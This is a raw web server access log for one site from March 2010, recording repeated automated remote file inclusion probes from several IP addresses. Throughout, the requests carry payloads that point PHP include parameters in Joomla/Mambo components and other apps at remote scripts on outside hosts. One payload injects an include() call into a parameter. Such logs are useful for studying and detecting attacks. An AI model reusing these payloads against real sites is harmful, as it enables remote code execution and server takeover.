216.108.237.12 - - [01/Mar/2010:05:26:03 -0800] "GET /http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:05:26:03 -0800] "GET /logs/access_100124.log%20%20/http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:05:26:20 -0800] "GET /logs/access_100220.log%20%20/http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.117.2.17 - - [01/Mar/2010:05:26:56 -0800] "GET /logs/access_100119.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.117.2.17 - - [01/Mar/2010:05:26:56 -0800] "GET /logs/access_100124.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:05:27:15 -0800] "GET /logs/access_100124.log/http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:05:27:43 -0800] "GET /logs/access_100220.log/http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:05:28:29 -0800] "GET /logs/access_100218.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:05:28:29 -0800] "GET /logs/access_100201.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://cyberzins.fileave.com/p1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:05:29:23 -0800] "GET /logs/access_100219.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:05:29:23 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:05:29:23 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:05:29:23 -0800] "GET /logs/access_100209.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.218 - - [01/Mar/2010:05:29:59 -0800] "GET /http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.218 - - [01/Mar/2010:05:29:59 -0800] "GET /logs/access_100220.log%20%20/http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.218 - - [01/Mar/2010:05:29:59 -0800] "GET /logs/http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.218 - - [01/Mar/2010:05:30:09 -0800] "GET /logs/access_100124.log%20%20/http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:05:30:11 -0800] "GET /logs/access_100211.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:05:30:45 -0800] "GET /logs/access_100127.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.218 - - [01/Mar/2010:05:31:29 -0800] "GET /logs/access_100124.log/http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:05:31:57 -0800] "GET /logs/access_100217.log/http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.218 - - [01/Mar/2010:05:32:05 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.218 - - [01/Mar/2010:05:32:05 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.218 - - [01/Mar/2010:05:32:06 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.218 - - [01/Mar/2010:05:32:17 -0800] "GET /logs/access_100220.log/http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:05:33:15 -0800] "GET /logs////////?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 4953 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:05:33:16 -0800] "GET /logs/access_100217.log%20%20////////?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:05:33:16 -0800] "GET ///////?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:05:33:19 -0800] "GET /logs/access_100124.log%20%20////////?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.218 - - [01/Mar/2010:05:33:33 -0800] "GET /logs/access_100127.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [01/Mar/2010:05:33:47 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
121.254.214.60 - - [01/Mar/2010:05:33:47 -0800] "GET /logs/access_100219.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
121.254.214.60 - - [01/Mar/2010:05:33:48 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
121.254.214.60 - - [01/Mar/2010:05:33:48 -0800] "GET /logs/access_100209.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:05:34:01 -0800] "GET /logs/access_100209.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:05:34:02 -0800] "GET /logs/access_100219.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.214.60 - - [01/Mar/2010:05:35:31 -0800] "GET /logs/access_100219.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
121.254.214.60 - - [01/Mar/2010:05:35:32 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
121.254.214.60 - - [01/Mar/2010:05:35:32 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
121.254.214.60 - - [01/Mar/2010:05:35:32 -0800] "GET /logs/access_100209.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lpm.mgroup.pl/modules/xoopsgallery/idv6-news.txt????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.150.78.218 - - [01/Mar/2010:05:38:41 -0800] "GET /logs/access_100211.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.218 - - [01/Mar/2010:05:38:46 -0800] "GET /logs/access_100127.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:05:38:59 -0800] "GET /components/com_remository/com_remository_constants.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:05:38:59 -0800] "GET /logs//components/com_remository/com_remository_constants.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:05:41:28 -0800] "GET ///////?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:05:41:30 -0800] "GET /logs/access_100217.log%20%20////////?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:05:41:30 -0800] "GET /logs////////?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 4953 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:05:42:07 -0800] "GET /logs/access_100124.log%20%20////////?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:44:14 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:44:14 -0800] "GET /logs/access_100127.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:44:14 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:44:14 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:44:15 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:44:15 -0800] "GET /logs/access_100127.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [01/Mar/2010:05:44:31 -0800] "GET /logs/access_100217.log%20%20////////?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [01/Mar/2010:05:44:31 -0800] "GET /logs////////?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 4953 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [01/Mar/2010:05:44:31 -0800] "GET ///////?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [01/Mar/2010:05:45:35 -0800] "GET /logs/access_100124.log%20%20////////?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:46:48 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:46:48 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:46:48 -0800] "GET /logs/access_100127.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:12 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:12 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:12 -0800] "GET /logs/access_100127.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:13 -0800] "GET /logs/access_100127.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:13 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:13 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:47:24 -0800] "GET /logs/access_100127.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:47:24 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:47:24 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:47:25 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:47:25 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:47:25 -0800] "GET /logs/access_100127.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:47:27 -0800] "GET /logs/access_100129.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:47:31 -0800] "GET /logs/access_100129.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:34 -0800] "GET /logs/access_100129.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:47:36 -0800] "GET /logs/access_100129.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:39 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:39 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:39 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:42 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:42 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:42 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:47:44 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:47:44 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:47:44 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:47:46 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:47:47 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:47:47 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:55 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:55 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:55 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:56 -0800] "GET /logs/access_100129.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:57 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:57 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:47:58 -0800] "GET /logs/access_100129.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:48:03 -0800] "GET /logs/access_100129.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:48:04 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:05:48:07 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:05:48:10 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:05:54:08 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:05:54:08 -0800] "GET /logs/access_100218.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:05:54:08 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:05:54:11 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:05:54:11 -0800] "GET /logs/access_100218.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:05:54:11 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
